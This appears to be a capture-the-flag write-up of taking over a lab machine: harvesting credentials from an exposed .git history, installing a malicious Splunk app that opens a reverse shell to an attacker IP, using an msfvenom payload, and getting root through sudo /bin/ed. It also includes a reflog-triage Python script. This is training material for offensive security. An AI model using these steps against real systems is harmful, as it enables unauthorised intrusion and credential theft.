Let’s start by deploying the machine and port scanning it.
The scan shows a web server on port 55555 that exposes a git repository. Open http://<IP>:55555/.git in the browser; requesting /.git/logs/HEAD returns the reflog, which confirms that a real repository is being served.
Let's clone it and check out the working tree. The checked-out files contain nothing useful, but the reflog and commit history are worth a look.
Searching through the commits, we notice that one of them adds a file named secret.
Showing that commit prints the file: git show 121cce9038070c86caa60707bc312d8a478d903f gives the output sputnik:ameer_says_thank_you_and_good_job, which looks like a username:password pair.
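The reflog fetched above is the quickest way to enumerate commits without cloning anything. The following Python script is an added example, not code from the writeup: it parses .git/logs/HEAD lines, flags commit messages that mention secret-like words, and lists the commits worth passing to git show. The reflog sample, the hashes, the keyword lists and the function names are all constructed for this example and are not taken from the machine; a commit that removes a secret no longer contains the file, so its parent (the old sha of that reflog entry) is included as well.

```python
import re
from typing import Dict, List

NULL_SHA = "0" * 40


def _line(old: str, new: str, ts: int, msg: str) -> str:
    # Helper that builds one constructed reflog line in git's format.
    return f"{old} {new} Dev One <dev@example.com> {ts} +0000\t{msg}"


# Constructed sample of a .git/logs/HEAD reflog; hashes and messages are made
# up for this example and do not come from the machine in the writeup.
SAMPLE_REFLOG = "\n".join([
    _line("0" * 40, "1" * 40, 1600000000, "commit (initial): initial import"),
    _line("1" * 40, "2" * 40, 1600000100, "commit: add secret for splunk login"),
    _line("2" * 40, "3" * 40, 1600000200, "commit: remove secret from repo"),
]) + "\n"

# One reflog line: <old-sha> <new-sha> <identity> <unix-ts> <tz>\t<message>
# The identity may contain spaces, so it is matched non-greedily up to the
# timestamp and timezone that always precede the tab.
REFLOG_LINE = re.compile(
    r"^(?P<old>[0-9a-f]{40}) (?P<new>[0-9a-f]{40}) (?P<ident>.+?) "
    r"(?P<ts>\d+) (?P<tz>[+-]\d{4})\t(?P<msg>.*)$"
)

# Assumed keyword lists; tune them for the target. "key" is deliberately
# broad and will also match words such as "monkey".
SECRET_WORDS = ("secret", "password", "passwd", "cred", "token", "key")
REMOVAL_WORDS = ("remove", "delete", "drop", "revert", "clean")


def parse_reflog(text: str) -> List[Dict[str, str]]:
    """Parse reflog text into dicts with old/new/ident/ts/tz/msg; bad lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = REFLOG_LINE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def flag_entries(entries: List[Dict[str, str]], words=SECRET_WORDS) -> List[Dict[str, str]]:
    """Return the entries whose commit message mentions a secret-like word."""
    return [e for e in entries if any(w in e["msg"].lower() for w in words)]


def commits_to_inspect(flagged: List[Dict[str, str]]) -> List[str]:
    """Commits worth running `git show` on, in discovery order, without duplicates.

    The commit that introduced the secret is the `new` sha of its entry.
    A commit that removed it no longer contains the file, but its parent
    (the `old` sha of that entry) still does, so that sha is added too.
    """
    seen: List[str] = []
    for e in flagged:
        candidates = [e["new"]]
        if any(w in e["msg"].lower() for w in REMOVAL_WORDS):
            candidates.append(e["old"])
        for sha in candidates:
            if sha != NULL_SHA and sha not in seen:
                seen.append(sha)
    return seen


def git_show_commands(text: str) -> List[str]:
    """End to end: reflog text -> list of `git show <sha>` commands to run."""
    shas = commits_to_inspect(flag_entries(parse_reflog(text)))
    return [f"git show {sha}" for sha in shas]


if __name__ == "__main__":
    for cmd in git_show_commands(SAMPLE_REFLOG):
        print(cmd)
```

Feed it the real reflog (for example the body of a GET for /.git/logs/HEAD saved to a file) and run each printed git show command inside the cloned repository; the keyword match is only a triage heuristic, so a commit with a bland message can still carry the interesting file.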
Port 61337 serves the Splunk web interface, so we log in there with that username and password.
After some research I came across this repo: https://github.com/TBGSecurity/splunk_shells. It adds custom search commands that spawn a reverse shell, but it has to be installed as a Splunk app first. Download the archive, then in Splunk go to Search & Reporting, open Manage Apps, click Install app from file, upload the archive and restart Splunk.
To get the reverse shell, start a listener on your <IP> and <PORT>, then enter the following in the search bar and hit enter: | revshell std <IP> <PORT>. The listener should receive the connection.
We try to get a second reverse shell with a Python one-liner, with no luck, so we use msfvenom to generate another reverse-shell payload.
With our listener running, we launch that payload, and this time the connection comes through.
Checking our sudo rights with sudo -l shows that we can run /bin/ed as root.
ed is a line-oriented text editor, and because it can run shell commands we can use it to spawn a root shell. You can read about it here: https://www.tutorialspoint.com/unix_commands/ed.htm.
Looking through the manual, I came across the following command:
!command Executes command via sh(1). If the first character of command is ‘!’, then it is replaced by text of the previous ‘!command’. ed does not process command for backslash (\) escapes. However, an unescaped ‘%’ is replaced by the default filename. When the shell returns from execution, a ‘!’ is printed to the standard output. The current line is unchanged.
So we run sudo /bin/ed and, at its prompt, enter !/bin/sh. ed executes the command via sh(1), and since ed itself is running as root, the shell it spawns is a root shell.
The root flag is in /root.